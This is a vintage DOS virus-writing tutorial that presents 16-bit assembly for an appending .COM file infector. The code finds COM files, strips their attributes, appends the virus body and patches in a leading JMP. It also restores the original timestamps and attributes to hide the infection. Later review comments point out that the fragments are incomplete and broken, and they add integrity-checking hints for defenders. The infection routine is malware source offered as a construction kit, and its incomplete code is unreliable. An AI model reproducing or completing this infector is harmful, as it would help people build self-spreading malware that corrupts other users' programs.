******************************************
** Constructing Kit on infecting .COM **
** **
** **
******************************************

***Disclaimer***
----------
This file is for information purposes only, I as author of this file, do not take any responsibility for anyone why uses this information in any illegal way. By downloading or copying this file, you are agreeing to not use this information in any illegal way.

This is a brief description what the ASM Source will do.

1. Find a .COM file in the current Directory
2. Save the Date and File's Attribute.
3. Save the First 3 Bytes in a Stack
4. Infect the File & restore new 3 bytes..
5. Put the OLD date and File Attributes back on

Beginning...
~~~~~~~~~~~~

; NOTE(review): The fragments below are excerpts of 16-bit DOS assembly
; (INT 21h services), not a complete program; several symbols they reference
; are not defined anywhere in this text.
; Read as a description of behaviour, the sequence is: look up a *.COM file,
; change its attributes, open it read/write, read its first 3 bytes, append
; data at end of file, overwrite the first 3 bytes with a near JMP (opcode
; 0E9h), then write the saved date/time and attributes back.
; For defenders: because date/time and attributes are written back, neither is
; evidence that a file is unmodified. The change still shows up as a different
; file length, a different hash, and a file that now begins with a 0E9h jump -
; the properties an integrity checker compares against a known-good baseline.

;----------------------------------------------------------------------
; The Simple routine to Search for a .COM File...
;----------------------------------------------------------------------

com_files db "*.com",0

        mov ah,4eh              ;point to a *.COM file...
        mov dx,com_files
        mov cx,3                ;Attributes with ReadOnly or Hidden
        int 21h                 ;is A okay...
        cmp ax,12h              ;Any files found?
        je exit                 ;If no Files found Exit...
        jmp found_file

; Instead of Exiting here you can make the Virus go and change dir and
; look for several other .com files elsewhere... with the help of the
; path or simply searching for more ...

found_file:
        mov di,[si+file]        ;di points to the filename
        push si
        add si,file             ;si points to filename...

        mov ax,offset 4300h     ;get file Attributes...
        mov dx,si               ;filename in dx..
        int 21h
        mov file_attrib,cx      ;Save file Attributes.

file dw 0

; Here we'll set the file attributes to nothing

        mov ax,offset 4301h     ;To set file Attributes...
        mov cx,offset 0fffeh    ;Set them to a Normal File
                                ; NOTE(review): bit 0 (read-only) is clear in
                                ; this value; the read-only attribute on its own
                                ; does not stop a program from modifying a file.
        mov dx,si               ;filename...
        int 21h

        mov ax,offset 3d02h     ;Open File to Read/Write.
        mov dx,si               ;ASCIIZ filename
        int 21h
        jnb ok                  ;If file was open continue
        jmp put_old_attrib      ; error happened restore old attribs
                                ; and quit.
ok:
        mov bx,ax               ; keep the value returned in AX by the open call in BX
        mov ax,offset 5700h     ;Get File Date & Time...
        int 21h
        mov old_time,cx         ;Save old File Time...
        mov old_date,dx         ;Save old File Date

old_time db 0
old_date db 0

; here we infect the file... but first we SAVE the first 3 bytes
; somewhere in our virus

        mov ah,3fh              ;Read file...
        mov cx,3                ;Number of bytes to read
        mov dx,first_3          ;Save bytes in the buffer
        add dx,si               ;Filename...
        int 21h
        cmp ax,3                ;Were 3 bytes read?
        jnz fix_file            ;If not fix file like before and quit

first_3 equ $                   ; The First three bytes of the Original File!
        int 20h                 ; the virus is infected to.
        nop

; This moves the File pointer to the END of the file

        mov ax,offset 4202h
        mov cx,0
        mov dx,0
        int 21h
        mov cx,ax               ;DX:AX is the FILESIZE!
        sub ax,3                ;subtract three because of file pointer
        add cx,offset c_len_y
        mov di,si
        sub di,offset c_len_x
        mov [di],cx             ;Modifies the 2nd & 3rd bytes of program

; Then writes our virus to the file

        mov ah,40h
        mov cx,virlength        ;Virus Length
        mov dx,si               ;File...
        sub dx,offset codelength ;Length of virus codes.
        int 21h
        cmp ax,offset virlength ;all bytes written?
        jnz fix_file            ;If no fix file and quit

;Moves the file pointer to the beginning of file and write the
;3 bytes JMP at the beginning of the file

        mov ax,offset 4200h
        mov cx,0
        mov dx,0
        int 21h

        mov ah,40h              ;Write to file...
        mov cx,3                ;# of bytes to write...
        mov dx,si               ;File name...
        add dx,jump             ;Point to the new JMP statement
        int 21h

jump db 0e9h                    ;This is the JMP that will be put in the
                                ;Beginning of the file!

;Restore Old File Time & Date

fix_file:
        mov dx,old_date         ;Old File Date
        mov cx,old_time         ;Old file Time...
        and cx,offset 0ffe0h    ;Flat Attribs.
                                ; NOTE(review): this mask clears the low five
                                ; bits of the time word (the seconds field in
                                ; the DOS time format), so the time written back
                                ; can differ from the saved one in its seconds.
        mov ax,offset 5701h     ; AX=5701h: set file date & time
        int 21h
        mov ah,3eh
        int 21h                 ;Close file...

; Here we'll restore the old file attributes...

put_old_attrib:
        mov ax,offset 4301h
        mov cx,old_att          ;old File Attributes.
        mov dx,si               ;Filename...
        int 21h

;----------------------------- EnD -------------------------------------

-anonymous